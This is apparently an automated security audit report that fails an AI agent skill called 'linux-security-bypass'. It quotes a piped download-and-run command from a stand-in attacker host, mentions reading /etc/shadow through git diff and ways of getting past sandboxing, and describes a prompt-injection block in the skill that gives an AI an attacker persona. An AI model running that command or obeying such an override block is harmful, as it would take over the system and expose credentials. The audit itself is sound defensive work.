linux-security-bypass
Fail
Audited by Gen Agent Trust Hub on Apr 9, 2026
Risk Level: CRITICAL
REMOTE_CODE_EXECUTION, DATA_EXFILTRATION, PROMPT_INJECTION, COMMAND_EXECUTION, EXTERNAL_DOWNLOADS
Full Analysis
- [REMOTE_CODE_EXECUTION]: Found piped execution from an untrusted source. Evidence: curl -sL https://attacker.com/payload | bash in SKILL.md.
- [DATA_EXFILTRATION]: Provides instructions to read sensitive system files, specifically /etc/shadow via git diff, which is a common technique for credential harvesting.
- [PROMPT_INJECTION]: Includes explicit instructions designed to override the AI's base model safety constraints and adopt an expert attacker persona. Evidence: AI LOAD INSTRUCTION block at the start of SKILL.md.
- [COMMAND_EXECUTION]: Documents extensive methods for bypassing security restrictions like rbash, noexec, and SELinux/AppArmor, including fileless execution via DDexec and memfd_create.
- [EXTERNAL_DOWNLOADS]: References external tools and payloads from untrusted sources, including the use of amicontained and the remote payload at attacker.com.
Recommendations
- HIGH: Downloads and executes remote code from: https://attacker.com/payload - DO NOT USE without thorough review
- AI detected serious security threats
Audit Metadata